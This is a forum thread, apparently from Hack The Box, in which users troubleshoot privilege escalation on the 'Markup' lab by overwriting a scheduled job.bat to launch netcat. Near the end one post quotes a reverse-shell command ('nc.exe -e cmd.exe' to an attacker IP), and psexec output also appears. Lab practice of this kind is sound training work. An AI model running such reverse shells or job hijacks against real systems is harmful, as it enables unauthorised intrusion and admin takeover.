Starting Point: Markup, job.bat and getting the admin shell

Hi everyone! It’s me again :slight_smile: I’ve been stuck on Markup for weeks at this point, trying to get the last step.

The method

  1. I upload the renamed nc executable to daniel’s account.
  2. I write to job.bat
    Running the commands
  3. I get a regular user shell on the port I listen on.
  4. I exit the regular shell, using something like Ctrl+C or Ctrl+D
  5. I try running the command again (writing to job.bat), and I get the error message that the process is already in use. (The screenshot shows PowerShell, but do note that for regular cmd the error message has a similar meaning - process is in use)
    Error message
    You will also note that I have tried both 32 and 64 bit versions of the executable.
  6. I can’t use my executable anymore with any port - new or old. Deleting the nc.exe (pancake-nc.exe) and reuploading it still produces the same error message. As daniel, I do not have the priviledges to access the runninng job list and physically killing all instances of my nc.
  7. I wait until the machines get reset and then I get another shot at it.

The research

So, I do monitor Starting Point for new questions, and these two caught my eye:

The question(s)

So, as far as I have understood, I just need to wait for the job to run to get an admin shell, it runs about every 30 seconds. But, there is the following that I do not understand:

  1. Is it the existing shell that gets upgraded or do I need to run the job at the right timing to get an admin shell instead of a regular daniel shell?
  2. If it’s the latter, how do I know when to run, given I only get one shot at it?
  3. If anyone knows any alternative ways how I can kill my own running jobs in this box, please let me know! The waiting until machines get reset and not being able to do anything is very frustrating!

Thank you in advance :slight_smile:

Hello world

I’m blocked on the last action, the upload does’nt work probelly :frowning:

How can i solve this ?

====================================================

kali@kali:~/impacket/examples$ ./psexec.py administrator@10.10.10.27
Impacket v0.9.22.dev1+20200513.101403.9a4b3f52 - Copyright 2020 SecureAuth Corporation

Password:
Requesting shares on 10.10.10.27…
Found writable share ADMIN$
[*] Uploading file UgmBhFGY.exe
[-] Error uploading file UgmBhFGY.exe, aborting…
[-] Error performing the installation, cleaning up: [Errno 32] Broken pipe

=======================================================

Best regards

@Ak47S0un Hello! While I am very happy that you are asking questions, please don’t hijack other people’s threads with your issue, stick to relevant discussions - your issue is with Archetype, the first Starting Point box (yes, there will be more to come after you solve this one :slight_smile: ), so please do post only in threads that discuss it, or I have noticed you have already created a topic with your issue. This will help keep discussions relevant.

@tasidonya I just rooted this box by using a Windows version of netcat rather than just copying netcat from my Kali box. I downloaded the file from netcat 1.11 for Win32/Win64 and then followed the guide…worked perfectly for me.
P.S. Thanks for your post on puttygen that helped me alot!

3 Likes

@quinnlaup Thank you for replying :slight_smile: I will give this a try!
P.S. Glad I could help! :slight_smile:

Progress update, no solution.

(Please excuse command screenshots, HTB didn’t like my plaintext commands, so I did it this way instead)

First of all, to address my “one executable - one attempt” question (question 3 in the original post):
To be able to reuse the same port and same executable press Ctrl+C in your listener tab, not the opened daniel shell with the pipe to job.bat. This way the > job.bat command will terminate itself and no issues with running processes should occur.

So I have followed @quinnlaup’s advice and downloaded a fresh zip file of nc for Windows. This time I have decided to work from the Temp directory.
C:\Users\daniel\AppData\Local\Temp\tasidonya
I have uploaded the nc.exe there. I know it’s a functioning executable because when I have ran

Regular nc command

I got a regular shell in my listener tab. I decided to work from PowerShell because I prefer it to regular cmd.

So, first, I tried to run the command from the walktrhough without alterations:

Same command into job.bat

(okay, there was a small alteration that the screenshot does not show, that is .\nc.exe instead of nc.exe because I am in PowerShell)
Every time I ran this command I instantly got a regular daniel shell on my listener tab. I have tried many times, with stopwatch and without to time the intervals at which the job.bat gets written to.

But then I thought, since the purpose of this command is to merely write to a bat file, not to open a shell straight away, I decided to tweak this command slightly:


view larger
(The tweak consists of surrounding the nc command by single quotation marks, so it becomes a string and doesn’t get executed)

So, this command, according to my assumptions, should have created a connection, piping whether a command succeeded or failed to a log file in my temp dir. The contents of C:\Log-Management\job.bat (obtained via type C:\Log-Management\job.bat) at this point was:


view larger

I do not know if it will work without a bat file, because when I did try to run it, I have rather carelessly left a new line in there, which has caused chaos in my shell.

After this command did not work, I tried to alter the command slightly again, but this one I did try outside the bat file, and it worked on its own:


view larger

but inside job.bat I have timed it and the job has ran, but I didn’t get back my 1 in the listener tab (I did make sure it was running and was listening on the right port). So now I am stuck. Either I did not get the purpose of the writing to job.bat command correctly or I am missing something.

Hello ! I won’t give the answer you are almost there…
My advice is that you search what a job is. In Linux or OSX, it is called cronjob. After that you’ll understand what you have to do. You might need to learn how to write one…

1 Like

Thank you thank you thank you, you have no ideas how much time I waisted trying to get netcat to work on the box untill i read this post :sweat_smile: work straight away with those files from your link

Hello, sorry if I jump in, but I’m still trying to get my reverse shell with admin rights working.
If I run both nc.exe and nc64.exe I get a working reverse shell but with daniel’s privileges.
From what I have see, seems there is no task job scheduled to run job.bat’s file as administrator, so that’s why it doesn’t run.
I can’t create a new task as administrator just because I don’t have it’s password, I’m struggling with it with no luck, any hint?
Thanks in advance.

Just a reminder, don’t rely on the walk-through only.
The guide didn’t work for me but found another way using the winpeas script :wink:

This worked, legend.

One thing I found out that nc64.exe did not work on the remote machine. I did not make a screenshot, but the error message was like “wrong version of windows for running the program nc64.exe”.

I tried using nc.exe (i.e., 32 bit) and it worked.

nc.exe/nc.exe at master · int0x33/nc.exe (github.com)

Thanks, mate, that was a great pointer. I downloaded that version of netcat and transferred it to the box, and it worked straight away. I tried it again with the nc64.exe version, and it still didn’t work so I think that was the issue.

Hello mates.

job.bat is overwritten but some time later it comes back to its original state, so the exploit doesnt work.

Does someone know what is happening? Thank you in advance.

Note: in PS i can see the history commands of other users and maybe machine creators.

echo “C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.33 1234” > .\job.bat

$cred = New-Object System.Management.Automation.PSCredential (“daniel”,$pass)

Start-Process -NoNewWindow -FilePath “C:\xampp\xampp_start.exe” -Credential $cred -

WorkingDirectory c:\users\daniel\documents

move nc.exe C:\USERS\daniel\nc.exe